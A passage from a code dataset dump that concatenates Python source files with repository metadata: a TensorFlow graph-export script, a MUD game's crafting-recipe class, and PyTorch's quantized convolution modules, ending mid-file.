FLAGS = tf.app.flags.FLAGS
def main(_):
if not FLAGS.output_file:
raise ValueError('You must supply the path to save to with --output_file')
tf.logging.set_verbosity(tf.logging.INFO)
with tf.Graph().as_default() as graph:
dataset = dataset_factory.get_dataset(FLAGS.dataset_name, 'validation',
FLAGS.dataset_dir)
preprocessing_name = FLAGS.model_name
image_preprocessing_fn = preprocessing_factory.get_preprocessing(
preprocessing_name,
is_training=False)
network_fn = nets_factory.get_network_fn(
FLAGS.model_name,
num_classes=(dataset.num_classes - FLAGS.labels_offset),
is_training=FLAGS.is_training)
if hasattr(network_fn, 'default_image_size'):
image_size = network_fn.default_image_size
else:
image_size = FLAGS.default_image_size
# placeholder = tf.placeholder(name='input', dtype=tf.float32,
# shape=[1, image_size, image_size, 3])
placeholder = tf.placeholder(name='input', dtype=tf.string)
image = tf.image.decode_jpeg(placeholder, channels=3)
image = image_preprocessing_fn(image, image_size, image_size)
image = tf.expand_dims(image, 0)
network_fn(image)
graph_def = graph.as_graph_def()
with gfile.GFile(FLAGS.output_file, 'wb') as f:
f.write(graph_def.SerializeToString())
if __name__ == '__main__':
tf.app.run()
| [
"jinluyuan@vip.qq.com"
] | jinluyuan@vip.qq.com |
ffee569c636d7a39e30d79887b2ae06f32ae5544 | e3365bc8fa7da2753c248c2b8a5c5e16aef84d9f | /indices/pennatula.py | 68acd65eab6d7430d81c725ac0c105e54266c3bb | [] | no_license | psdh/WhatsintheVector | e8aabacc054a88b4cb25303548980af9a10c12a8 | a24168d068d9c69dc7a0fd13f606c080ae82e2a6 | refs/heads/master | 2021-01-25T10:34:22.651619 | 2015-09-23T11:54:06 | 2015-09-23T11:54:06 | 42,749,205 | 2 | 3 | null | 2015-09-23T11:54:07 | 2015-09-18T22:06:38 | Python | UTF-8 | Python | false | false | 44 | py | ii = [('RogePAV2.py', 2), ('RogePAV.py', 6)] | [
"prabhjyotsingh95@gmail.com"
] | prabhjyotsingh95@gmail.com |
7ecec0f8ce1a77817d1d3f1b5be71e05c68dac13 | e82b3c6000fe8e4639d6606f9d3605e75a8a5d5c | /src/secondaires/crafting/recette.py | 8cb0d2ffbe27e770852aa4faf11fc68101ad3017 | [
"BSD-3-Clause"
] | permissive | vincent-lg/tsunami | 804585da7bd1d159ad2c784b39f801963ca73c03 | 7e93bff08cdf891352efba587e89c40f3b4a2301 | refs/heads/master | 2022-08-02T15:54:35.480614 | 2022-07-18T12:06:41 | 2022-07-18T12:06:41 | 25,605,543 | 5 | 2 | BSD-3-Clause | 2019-06-05T15:59:08 | 2014-10-22T21:34:10 | Python | UTF-8 | Python | false | false | 11,391 | py | # -*-coding:Utf-8 -*
# Copyright (c) 2010-2017 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Module containing the Recette class, detailed below."""
from abstraits.obase import BaseObj
from primaires.format.fonctions import supprimer_accents
from primaires.scripting.script import Script
class Recette(BaseObj):
    """Class representing a crafting recipe.
    A recipe is a combination of objects or types used to produce a
    result. For instance, enough fur combined with leather strips can
    form a bag.
    The right recipe is selected based on the objects or the types
    involved. A recipe may, for example, require fur (which is an
    object type), in which case any fur will do, or specifically
    rabbit fur.
    In terms of object attributes, two dictionaries are used: one for
    specific objects, the other for types.
    """
nom_scripting = "la recette"
def __init__(self, rang):
        """Recipe constructor."""
BaseObj.__init__(self)
self.rang = rang
self.nom = ""
self.nb_max = 1
self.ingredients_objets = {}
self.ingredients_types = {}
self.resultat = ""
self.quantite = 1
self.script = ScriptRecette(self)
self._construire()
def __getnewargs__(self):
return (None, )
def __repr__(self):
return "<Recette pour {}>".format(self.resultat)
def __str__(self):
return "recette pour {}".format(repr(self.resultat))
@property
def description(self):
msg = ""
if self.nom:
msg = self.nom + " pour "
msg += self.resultat + "("
premier = True
        # Display the types
for cle, (qtt_min, qtt_max) in self.ingredients_types.items():
qtt = qtt_min if qtt_min == qtt_max else "{}-{}".format(
qtt_min, qtt_max)
if premier:
premier = False
else:
msg += ", "
msg += "type {} X {}".format(cle, qtt)
        # Display the objects
for cle, (qtt_min, qtt_max) in self.ingredients_objets.items():
qtt = qtt_min if qtt_min == qtt_max else "{}-{}".format(
qtt_min, qtt_max)
if premier:
premier = False
else:
msg += ", "
msg += "objet {} X {}".format(cle, qtt)
msg += ")"
return msg
def peut_faire(self, personnage, ingredients):
        """Check whether the list of ingredients satisfies the recipe.
        For each ingredient, its type and key are checked; one of them
        must appear among the recipe's requirements.
        Note that if there are too many ingredients, this recipe is
        not selected.
        """
ingredients = list(ingredients)
guilde = self.rang.guilde
rec_evt = self.script["valide"]
guilde_evt = guilde.script["recette"]["valide"]
if guilde_evt.nb_lignes > 0:
guilde_evt.executer(personnage=personnage, ingredients=ingredients,
recette=self.resultat)
try:
valide = guilde_evt.espaces.variables["valide"]
except KeyError:
raise ValueError("la variable 'valide' n'est apparemment " \
"pas définie")
return bool(valide)
elif rec_evt.nb_lignes > 0:
rec_evt.executer(personnage=personnage, ingredients=ingredients)
try:
                valide = rec_evt.espaces.variables["valide"]
except KeyError:
raise ValueError("la variable 'valide' n'est apparemment " \
"pas définie")
return bool(valide)
types = self.ingredients_types.copy()
types_min = dict((t, q) for t, (q, x) in types.items())
types_max = dict((t, x - q) for t, (q, x) in types.items() if \
x - q > 0)
objets = self.ingredients_objets.copy()
objets_min = dict((o, q) for o, (q, x) in objets.items())
objets_max = dict((o, x - q) for o, (q, x) in objets.items() if \
x - q > 0)
for ingredient in list(ingredients):
cle = ingredient.cle
nom_type = ingredient.nom_type
if cle in objets_min:
objets_min[cle] -= 1
if objets_min[cle] <= 0:
del objets_min[cle]
elif cle in objets_max:
objets_max[cle] -= 1
if objets_max[cle] <= 0:
del objets_max[cle]
elif nom_type in types_min:
types_min[nom_type] -= 1
if types_min[nom_type] <= 0:
del types_min[nom_type]
elif nom_type in types_max:
types_max[nom_type] -= 1
if types_max[nom_type] <= 0:
del types_max[nom_type]
else:
return False
ingredients.remove(ingredient)
if types_min == {} and objets_min == {} and ingredients == []:
            # The expected requirements were met
return True
return False
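The quantity matching above splits every requirement into a mandatory minimum and an optional surplus (`max - min`), then consumes ingredients against those two pools. A simplified, standalone sketch of that algorithm (helper and variable names here are illustrative, not part of the project's API) working on plain keys instead of game objects:

```python
# Simplified sketch of the min/max ingredient matching used by peut_faire.
# requirements maps an ingredient key to a (min, max) quantity pair;
# ingredients is the flat list of ingredient keys offered by the player.
def matches_recipe(requirements, ingredients):
    remaining_min = {k: q for k, (q, _) in requirements.items()}
    remaining_extra = {k: x - q for k, (q, x) in requirements.items() if x > q}
    for key in ingredients:
        if remaining_min.get(key, 0) > 0:
            remaining_min[key] -= 1
            if remaining_min[key] == 0:
                del remaining_min[key]
        elif remaining_extra.get(key, 0) > 0:
            remaining_extra[key] -= 1
        else:
            return False  # an ingredient the recipe has no room for
    return not remaining_min  # every mandatory minimum was consumed

# Two furs required, a third accepted, plus exactly one leather strip:
reqs = {"fur": (2, 3), "leather": (1, 1)}
print(matches_recipe(reqs, ["fur", "fur", "leather"]))          # True
print(matches_recipe(reqs, ["fur", "fur", "fur", "leather"]))   # True (surplus fur)
print(matches_recipe(reqs, ["fur", "leather"]))                 # False (minimum not met)
print(matches_recipe(reqs, ["fur", "fur", "leather", "wood"]))  # False (unexpected item)
```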
def creer_resultat(self, personnage, ingredients):
        """Create the recipe's result and return the created objects."""
if not self.peut_faire(personnage, ingredients):
raise ValueError("Les ingrédients {} ne peuvent pas être " \
"utilisés pour cette recette {}".format(
ingredients, repr(self.resultat)))
prototype = importeur.objet.prototypes[self.resultat]
objets = []
for i in range(self.quantite):
objets.append(importeur.objet.creer_objet(prototype))
        # Transfer the attributes
attributs = {}
for ingredient in ingredients:
prototype = ingredient.prototype
attrs = importeur.crafting.configuration[prototype].attributs
if attrs:
attributs.update(attrs)
attrs = importeur.crafting.configuration[ingredient].attributs
if attrs:
attributs.update(attrs)
sa_attributs = {}
for cle, valeur in attributs.items():
sa_attributs[supprimer_accents(cle).lower()] = valeur
for objet in objets:
importeur.crafting.configuration[objet].attributs = dict(
sa_attributs)
            # Copy the attributes into the name
for attribut, valeur in sa_attributs.items():
objet.nom_singulier = objet.nom_singulier.replace(
"${}".format(attribut), valeur)
objet.nom_pluriel = objet.nom_pluriel.replace(
"${}".format(attribut), valeur)
personnage.salle.objets_sol.ajouter(objet)
self.script["fabrique"].executer(personnage=personnage,
objet=objet, ingredients=ingredients)
for ingredient in ingredients:
importeur.objet.supprimer_objet(ingredient.identifiant)
return objets
class ScriptRecette(Script):
    """Script and events specific to recipes."""
def init(self):
        """Initialize the script."""
        # The 'fabrique' (crafted) event
evt_fabrique = self.creer_evenement("fabrique")
evt_fabrique.aide_courte = "la recette est fabriquée"
evt_fabrique.aide_longue = \
"Cet évènement est appelé quand un personnage fabrique " \
"la recette. Elle est appelée après la fabrication de " \
"la recette et permet de personnaliser l'objet créé " \
"depuis les ingrédients (variable 'objet'). Les " \
"ingrédients sont aussi disponibles dans la variable " \
"'ingredients'."
        # Variables of the 'fabrique' event
var_perso = evt_fabrique.ajouter_variable("personnage", "Personnage")
var_perso.aide = "le personnage fabriquant la recette"
var_objet = evt_fabrique.ajouter_variable("objet", "Objet")
var_objet.aide = "l'objet créé par la recette"
var_ingredients = evt_fabrique.ajouter_variable("ingredients", "list")
var_ingredients.aide = "la liste des ingrédients (liste d'objets)"
        # The 'valide' (valid) event
evt_valide = self.creer_evenement("valide")
evt_valide.aide_courte = "la recette est-elle valide ?"
evt_valide.aide_longue = \
"Cet évènement permet de configurer de façon plus précise " \
"le fait qu'une recette est valide ou non. Elle permet " \
"d'outre-passer les ingrédients précisés dans la recette, " \
"pour utiliser des critères plus spécifiques, par exemple, " \
"ou bien chercher d'autres ingrédients ailleurs. Un exemple " \
"concret pourrait être de limiter le nombre d'ingrédients " \
"en fonction de leur poids et pas de leur quantité. Si " \
"cet évènement ne contient aucune instruction, les objets " \
"et types définis dans la recette sont utilisés pour " \
"savoir si elle est valide. Sinon, cet évènement est " \
"appelé. La variable 'valide' doit être créée : elle " \
"doit avoir une valeur de |ent|1|ff| pour indiquer que " \
"la recette a bien été validée, |ent|0|ff| sinon."
        # Variables of the 'valide' event
var_perso = evt_valide.ajouter_variable("personnage", "Personnage")
var_perso.aide = "le personnage fabriquant la recette"
var_ingredients = evt_valide.ajouter_variable("ingredients", "list")
var_ingredients.aide = "la liste des ingrédients (liste d'objets)"
| [
"vincent.legoff.srs@gmail.com"
] | vincent.legoff.srs@gmail.com |
ddd546a4eb1f6fea8aac981c9f1ba18b18698851 | 2baeb9965f64214e5a1478ab5139c53bb363ff50 | /torch/nn/quantized/modules/conv.py | 99a0f969739ae231a6e42f28a57f3925a28ddd6d | [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"BSL-1.0",
"Apache-2.0"
] | permissive | Dithn/pytorch | b327d9a7434a0dbadb7bbf148b22cef7d2e4bc1c | 86399d8e0cb72dfd1501fb9be870ac29af38e241 | refs/heads/master | 2023-04-26T12:01:26.043128 | 2021-11-16T19:54:14 | 2021-11-16T19:55:40 | 207,961,157 | 1 | 0 | NOASSERTION | 2021-11-17T02:14:51 | 2019-09-12T03:58:02 | C++ | UTF-8 | Python | false | false | 35,148 | py | # coding=utf-8
r"""Quantized convolution modules."""
from typing import Optional, List, TypeVar
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.nn.intrinsic as nni
import torch.nn.intrinsic.qat as nniqat
from torch._ops import ops
from torch.nn.common_types import _size_1_t
from torch.nn.modules.utils import _single, _pair, _triple
from torch.nn.quantized.modules.utils import _quantize_weight
from torch.nn.utils import fuse_conv_bn_weights
_SUPPORTED_PADDING = {
'zeros',
'reflect'
}
def _reverse_repeat_padding(padding: List[int]) -> List[int]:
_reversed_padding_repeated_twice: List[int] = []
N = len(padding)
for idx in range(N):
for _ in range(2):
_reversed_padding_repeated_twice.append(padding[N - idx - 1])
return _reversed_padding_repeated_twice
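The helper above converts a per-dimension padding list into the argument order `F.pad` expects: last dimension first, with each amount repeated for the "before" and "after" sides. A standalone copy of the same logic (renamed here only so it can run outside this module) illustrates the transformation:

```python
# Standalone sketch of _reverse_repeat_padding: F.pad takes padding from the
# last spatial dimension backwards, as (before, after) pairs, so a symmetric
# per-dimension padding list is reversed and every entry is duplicated.
from typing import List

def reverse_repeat_padding(padding: List[int]) -> List[int]:
    out: List[int] = []
    n = len(padding)
    for idx in range(n):
        for _ in range(2):
            out.append(padding[n - idx - 1])
    return out

print(reverse_repeat_padding([1, 2]))     # -> [2, 2, 1, 1]
print(reverse_repeat_padding([3]))        # -> [3, 3]  (the Conv1d case)
print(reverse_repeat_padding([1, 2, 3]))  # -> [3, 3, 2, 2, 1, 1]
```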
class _ConvNd(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride=1,
padding=0, dilation=1, groups=1, bias=True,
padding_mode='zeros', device=None, dtype=None):
        # All subclasses have this signature - See PR #49702
raise NotImplementedError
def _init(self, in_channels, out_channels, kernel_size, stride,
padding, dilation,
transposed, output_padding,
groups, bias,
padding_mode='zeros',
device=None,
dtype=None) -> None:
factory_kwargs = {'device': device, 'dtype': dtype}
super(_ConvNd, self).__init__()
if in_channels % groups != 0:
raise ValueError('in_channels must be divisible by groups')
if out_channels % groups != 0:
raise ValueError('out_channels must be divisible by groups')
self.in_channels = in_channels
self.out_channels = out_channels
self.kernel_size = kernel_size
self.stride = stride
self.padding = padding
self.dilation = dilation
self.transposed = transposed
self.output_padding = output_padding
self.groups = groups
if padding_mode not in _SUPPORTED_PADDING:
raise ValueError("'padding_mode' {} is not supported by quantized convolution".format(padding_mode))
self.padding_mode = padding_mode
# Initialize as NCHW. set_weight will internally transpose to NHWC.
if self.transposed:
weight_shape = [in_channels, out_channels // self.groups]
else:
weight_shape = [out_channels, in_channels // self.groups]
qweight = torch._empty_affine_quantized(
weight_shape + list(kernel_size),
scale=1, zero_point=0, dtype=torch.qint8,
**{k: v for k, v in factory_kwargs.items() if k != 'dtype'})
bias_float = (
torch.zeros(out_channels, dtype=torch.float,
**{k: v for k, v in factory_kwargs.items() if k != 'dtype'}) if bias else None)
self.set_weight_bias(qweight, bias_float)
self.scale = 1.0
self.zero_point = 0
def set_weight_bias(self, qweight, bias_float):
raise NotImplementedError
def bias(self):
raise NotImplementedError
def _weight_bias(self):
raise NotImplementedError
def extra_repr(self):
s = ('{in_channels}, {out_channels}, kernel_size={kernel_size}'
', stride={stride}, scale={scale}, zero_point={zero_point}')
if self.padding != (0,) * len(self.padding):
s += ', padding={padding}'
if self.dilation != (1,) * len(self.dilation):
s += ', dilation={dilation}'
if self.output_padding != (0,) * len(self.output_padding):
s += ', output_padding={output_padding}'
if self.groups != 1:
s += ', groups={groups}'
if self.bias() is None:
s += ', bias=False'
return s.format(**self.__dict__)
# ===== Serialization methods =====
# The special consideration here is that we have to unpack the weights into
# their regular QTensor form for serialization. Packed weights should not
# live outside the process in which they were created, rather they should be
# derived from the QTensor weight.
# self
# |--- weight : Tensor
# |--- bias : Tensor
#
# TODO: maybe change to this when https://github.com/pytorch/pytorch/pull/32958 is landed
# self
# |--- _packed_params : Conv2dPackedParamsBase or Conv3dPackedParamsBase
def _save_to_state_dict(self, destination, prefix, keep_vars):
super(_ConvNd, self)._save_to_state_dict(destination, prefix, keep_vars)
(w, b) = self._weight_bias()
destination[prefix + 'weight'] = w
destination[prefix + 'bias'] = b
destination[prefix + 'scale'] = torch.tensor(self.scale)
destination[prefix + 'zero_point'] = torch.tensor(self.zero_point)
@torch.jit.export
def __getstate__(self):
(w, b) = self._weight_bias()
return (
self.in_channels,
self.out_channels,
self.kernel_size,
self.stride,
self.padding,
self.dilation,
self.transposed,
self.output_padding,
self.groups,
self.padding_mode,
w,
b,
self.scale,
self.zero_point,
self.training
)
# ===== Deserialization methods =====
# Counterpart to the serialization methods, we must pack the serialized
# QTensor weight into its packed format for use by the FBGEMM ops.
def _load_from_state_dict(self, state_dict, prefix, local_metadata, strict,
missing_keys, unexpected_keys, error_msgs):
self.set_weight_bias(
state_dict[prefix + 'weight'], state_dict[prefix + 'bias'])
state_dict.pop(prefix + 'weight')
state_dict.pop(prefix + 'bias')
self.scale = float(state_dict[prefix + 'scale'])
state_dict.pop(prefix + 'scale')
self.zero_point = int(state_dict[prefix + 'zero_point'])
state_dict.pop(prefix + 'zero_point')
super(_ConvNd, self)._load_from_state_dict(
state_dict, prefix, local_metadata, False, missing_keys,
unexpected_keys, error_msgs)
@torch.jit.export
def __setstate__(self, state):
self.in_channels = state[0]
self.out_channels = state[1]
self.kernel_size = state[2]
self.stride = state[3]
self.padding = state[4]
self.dilation = state[5]
self.transposed = state[6]
self.output_padding = state[7]
self.groups = state[8]
self.padding_mode = state[9]
self.set_weight_bias(state[10], state[11])
self.scale = state[12]
self.zero_point = state[13]
self.training = state[14]
def __deepcopy__(self, memo):
new_instance = type(self).__new__(type(self))
torch.nn.Module.__init__(new_instance)
state = self.__getstate__()
new_instance.__setstate__(state)
return new_instance
def __copy__(self):
return self.__deepcopy__({})
@classmethod
def get_qconv(cls, mod, activation_post_process, weight_post_process=None):
r"""Creates a qconv object and returns it.
"""
if weight_post_process is None:
weight_post_process = mod.qconfig.weight()
weight_post_process(mod.weight)
assert weight_post_process.dtype == torch.qint8, \
'Weight observer must have a dtype of qint8'
qweight = _quantize_weight(mod.weight.float(), weight_post_process)
# the __init__ call used is the one from derived classes and not the one from _ConvNd
qconv = cls(mod.in_channels, mod.out_channels, mod.kernel_size,
mod.stride, mod.padding, mod.dilation, mod.groups,
mod.bias is not None, mod.padding_mode)
qconv.set_weight_bias(qweight, mod.bias)
if activation_post_process is None or activation_post_process.dtype == torch.float:
return qconv # dynamic quantization doesn't need scale/zero_point
else:
act_scale, act_zp = activation_post_process.calculate_qparams()
qconv.scale = float(act_scale)
qconv.zero_point = int(act_zp)
return qconv
@staticmethod
def from_float(cls, mod):
if hasattr(mod, "weight_fake_quant"):
# assert type(mod) == cls.__QAT_MODULE, " nnq." + cls.__name__ + \
# ".from_float only works for " + cls.__QAT_MODULE.__name__
if type(mod) == cls._NNIQAT_CONV_BN_MODULE:
mod.weight, mod.bias = fuse_conv_bn_weights(
mod.weight, mod.bias, mod.bn.running_mean, mod.bn.running_var,
mod.bn.eps, mod.bn.weight, mod.bn.bias)
assert hasattr(mod, "activation_post_process"), \
"Input QAT module must have observer attached"
weight_post_process = mod.weight_fake_quant
activation_post_process = mod.activation_post_process
else:
assert type(mod) == cls._FLOAT_MODULE, \
" nnq." + cls.__name__ + ".from_float only works for " + \
cls._FLOAT_MODULE.__name__ + " but got:" + str(type(mod))
assert hasattr(mod, "qconfig"), \
"Input float module must have qconfig defined."
activation_post_process = None if not hasattr(
mod, "activation_post_process") else mod.activation_post_process
if type(mod) == cls._NNI_CONV_RELU_MODULE:
mod = mod[0]
weight_post_process = mod.qconfig.weight()
return cls.get_qconv(mod, activation_post_process, weight_post_process)
class Conv1d(_ConvNd):
r"""Applies a 1D convolution over a quantized input signal composed of
several quantized input planes.
For details on input arguments, parameters, and implementation see
:class:`~torch.nn.Conv1d`.
.. note::
Only `zeros` is supported for the :attr:`padding_mode` argument.
.. note::
Only `torch.quint8` is supported for the input data type.
Attributes:
weight (Tensor): packed tensor derived from the learnable weight
parameter.
scale (Tensor): scalar for the output scale
zero_point (Tensor): scalar for the output zero point
See :class:`~torch.nn.Conv1d` for other attributes.
Examples::
>>> m = nn.quantized.Conv1d(16, 33, 3, stride=2)
>>> input = torch.randn(20, 16, 100)
>>> # quantize input to quint8
>>> q_input = torch.quantize_per_tensor(input, scale=1.0, zero_point=0,
dtype=torch.quint8)
>>> output = m(q_input)
"""
_FLOAT_MODULE = nn.Conv1d
_NNIQAT_CONV_BN_MODULE = nniqat.ConvBn1d
_NNI_CONV_RELU_MODULE = nni.ConvReLU1d
def __init__(self,
in_channels: int,
out_channels: int,
kernel_size: _size_1_t,
stride: _size_1_t = 1,
padding: _size_1_t = 0,
dilation: _size_1_t = 1,
groups: int = 1,
bias: bool = True,
padding_mode: str = 'zeros',
device=None,
dtype=None):
factory_kwargs = {'device': device, 'dtype': dtype}
kernel_size = _single(kernel_size)
stride = _single(stride)
padding = padding if isinstance(padding, str) else _single(padding)
dilation = _single(dilation)
        # Subclasses of _ConvNd need to call _init rather than __init__. See
# discussion on PR #49702
super(Conv1d, self)._init(
in_channels, out_channels, kernel_size, stride, padding, dilation,
False, _single(0), groups, bias, padding_mode, **factory_kwargs)
def _get_name(self):
return 'QuantizedConv1d'
def set_weight_bias(self, w: torch.Tensor, b: Optional[torch.Tensor]) -> None:
if self.padding_mode == 'zeros':
self._packed_params = torch.ops.quantized.conv1d_prepack(
w, b, self.stride, self.padding, self.dilation, self.groups)
else:
self._packed_params = torch.ops.quantized.conv1d_prepack(
w, b, self.stride, _pair(0), self.dilation,
self.groups)
def _weight_bias(self):
w, b = torch.ops.quantized.conv1d_unpack(self._packed_params)
return w, b
def weight(self):
return self._weight_bias()[0]
def bias(self):
return self._weight_bias()[1]
def forward(self, input):
# Temporarily using len(shape) instead of ndim due to JIT issue
# https://github.com/pytorch/pytorch/issues/23890
if len(input.shape) != 3:
raise ValueError("Input shape must be `(N, C, L)`!")
if self.padding_mode != 'zeros':
# Padding in Conv1d is stored as (p, p), need to get (p,)
_reversed_padding_repeated_twice = _reverse_repeat_padding(self.padding[:1])
input = F.pad(input, _reversed_padding_repeated_twice,
mode=self.padding_mode)
return ops.quantized.conv1d(input, self._packed_params, self.scale, self.zero_point)
@classmethod
def from_float(cls, mod):
r"""Creates a quantized module from a float module or qparams_dict.
Args:
mod (Module): a float module, either produced by torch.ao.quantization
utilities or provided by the user
"""
return _ConvNd.from_float(cls, mod)
class Conv2d(_ConvNd):
r"""Applies a 2D convolution over a quantized input signal composed of
several quantized input planes.
For details on input arguments, parameters, and implementation see
:class:`~torch.nn.Conv2d`.
.. note::
Only `zeros` is supported for the :attr:`padding_mode` argument.
.. note::
Only `torch.quint8` is supported for the input data type.
Attributes:
weight (Tensor): packed tensor derived from the learnable weight
parameter.
scale (Tensor): scalar for the output scale
zero_point (Tensor): scalar for the output zero point
See :class:`~torch.nn.Conv2d` for other attributes.
Examples::
>>> # With square kernels and equal stride
>>> m = nn.quantized.Conv2d(16, 33, 3, stride=2)
>>> # non-square kernels and unequal stride and with padding
>>> m = nn.quantized.Conv2d(16, 33, (3, 5), stride=(2, 1), padding=(4, 2))
>>> # non-square kernels and unequal stride and with padding and dilation
>>> m = nn.quantized.Conv2d(16, 33, (3, 5), stride=(2, 1), padding=(4, 2), dilation=(3, 1))
>>> input = torch.randn(20, 16, 50, 100)
>>> # quantize input to quint8
>>> q_input = torch.quantize_per_tensor(input, scale=1.0, zero_point=0, dtype=torch.quint8)
>>> output = m(q_input)
"""
_FLOAT_MODULE = nn.Conv2d
_NNIQAT_CONV_BN_MODULE = nniqat.ConvBn2d
_NNI_CONV_RELU_MODULE = nni.ConvReLU2d
def __init__(self, in_channels, out_channels, kernel_size, stride=1,
padding=0, dilation=1, groups=1, bias=True,
padding_mode='zeros', device=None, dtype=None):
factory_kwargs = {'device': device, 'dtype': dtype}
kernel_size = _pair(kernel_size)
stride = _pair(stride)
padding = _pair(padding)
dilation = _pair(dilation)
# Subclasses of _ConvNd need to call _init rather than __init__. See
# discussion on PR #49702
super(Conv2d, self)._init(
in_channels, out_channels, kernel_size, stride, padding, dilation,
False, _pair(0), groups, bias, padding_mode, **factory_kwargs)
def _get_name(self):
return 'QuantizedConv2d'
def set_weight_bias(self, w: torch.Tensor, b: Optional[torch.Tensor]) -> None:
if self.padding_mode == 'zeros':
self._packed_params = torch.ops.quantized.conv2d_prepack(
w, b, self.stride, self.padding, self.dilation, self.groups)
else:
self._packed_params = torch.ops.quantized.conv2d_prepack(
w, b, self.stride, _pair(0), self.dilation, self.groups)
def _weight_bias(self):
return self._packed_params.unpack()
def weight(self):
return self._weight_bias()[0]
def bias(self):
return self._weight_bias()[1]
def forward(self, input):
# Temporarily using len(shape) instead of ndim due to JIT issue
# https://github.com/pytorch/pytorch/issues/23890
if len(input.shape) != 4:
raise ValueError("Input shape must be `(N, C, H, W)`!")
if self.padding_mode != 'zeros':
_reversed_padding_repeated_twice = _reverse_repeat_padding(self.padding)
input = F.pad(input, _reversed_padding_repeated_twice,
mode=self.padding_mode)
return ops.quantized.conv2d(
input, self._packed_params, self.scale, self.zero_point)
@classmethod
def from_float(cls, mod):
r"""Creates a quantized module from a float module or qparams_dict.
Args:
mod (Module): a float module, either produced by torch.ao.quantization
utilities or provided by the user
"""
return _ConvNd.from_float(cls, mod)
class Conv3d(_ConvNd):
r"""Applies a 3D convolution over a quantized input signal composed of
several quantized input planes.
For details on input arguments, parameters, and implementation see
:class:`~torch.nn.Conv3d`.
.. note::
Only `zeros` is supported for the :attr:`padding_mode` argument.
.. note::
Only `torch.quint8` is supported for the input data type.
Attributes:
weight (Tensor): packed tensor derived from the learnable weight
parameter.
scale (Tensor): scalar for the output scale
zero_point (Tensor): scalar for the output zero point
See :class:`~torch.nn.Conv3d` for other attributes.
Examples::
>>> # With square kernels and equal stride
>>> m = nn.quantized.Conv3d(16, 33, 3, stride=2)
>>> # non-square kernels and unequal stride and with padding
>>> m = nn.quantized.Conv3d(16, 33, (3, 5, 5), stride=(1, 2, 2), padding=(1, 2, 2))
>>> # non-square kernels and unequal stride and with padding and dilation
>>> m = nn.quantized.Conv3d(16, 33, (3, 5, 5), stride=(1, 2, 2), padding=(1, 2, 2), dilation=(1, 2, 2))
>>> input = torch.randn(20, 16, 56, 56, 56)
>>> # quantize input to quint8
>>> q_input = torch.quantize_per_tensor(input, scale=1.0, zero_point=0, dtype=torch.quint8)
>>> output = m(q_input)
"""
_FLOAT_MODULE = nn.Conv3d
_NNIQAT_CONV_BN_MODULE = nniqat.ConvBn3d
_NNI_CONV_RELU_MODULE = nni.ConvReLU3d
def __init__(self, in_channels, out_channels, kernel_size, stride=1,
padding=0, dilation=1, groups=1, bias=True,
padding_mode='zeros', device=None, dtype=None):
assert padding_mode != 'reflect', "Conv3d does not support reflection padding"
factory_kwargs = {'device': device, 'dtype': dtype}
kernel_size = _triple(kernel_size)
stride = _triple(stride)
padding = _triple(padding)
dilation = _triple(dilation)
# Subclasses of _ConvNd need to call _init rather than __init__. See
# discussion on PR #49702
super(Conv3d, self)._init(
in_channels, out_channels, kernel_size, stride, padding, dilation,
False, _triple(0), groups, bias, padding_mode, **factory_kwargs)
def _get_name(self):
return 'QuantizedConv3d'
def set_weight_bias(self, w: torch.Tensor, b: Optional[torch.Tensor]) -> None:
if self.padding_mode == 'zeros':
self._packed_params = torch.ops.quantized.conv3d_prepack(
w, b, self.stride, self.padding, self.dilation, self.groups)
else:
self._packed_params = torch.ops.quantized.conv3d_prepack(
w, b, self.stride, _triple(0), self.dilation, self.groups)
def _weight_bias(self):
return self._packed_params.unpack()
def weight(self):
return self._weight_bias()[0]
def bias(self):
return self._weight_bias()[1]
def forward(self, input):
# Temporarily using len(shape) instead of ndim due to JIT issue
# https://github.com/pytorch/pytorch/issues/23890
if len(input.shape) != 5:
raise ValueError("Input shape must be `(N, C, D, H, W)`!")
if self.padding_mode != 'zeros':
_reversed_padding_repeated_twice = _reverse_repeat_padding(self.padding)
input = F.pad(input, _reversed_padding_repeated_twice,
mode=self.padding_mode)
return ops.quantized.conv3d(
input, self._packed_params, self.scale, self.zero_point)
@classmethod
def from_float(cls, mod):
r"""Creates a quantized module from a float module or qparams_dict.
Args:
mod (Module): a float module, either produced by torch.ao.quantization
utilities or provided by the user
"""
return _ConvNd.from_float(cls, mod)
# === Transposed Convolutions ===
MOD = TypeVar('MOD', bound=nn.modules.conv._ConvNd)
class _ConvTransposeNd(_ConvNd):
_FLOAT_MODULE = MOD
def __init__(self, in_channels, out_channels, kernel_size, stride,
padding, dilation, transposed, output_padding,
groups, bias, padding_mode, device=None, dtype=None):
if padding_mode != 'zeros':
raise ValueError('Only "zeros" padding mode is supported for {}'.format(self.__class__.__name__))
factory_kwargs = {'device': device, 'dtype': dtype}
# Subclasses of _ConvNd need to call _init rather than __init__. See
# discussion on PR #49702
super(_ConvTransposeNd, self)._init(
in_channels, out_channels, kernel_size, stride,
padding, dilation, transposed, output_padding,
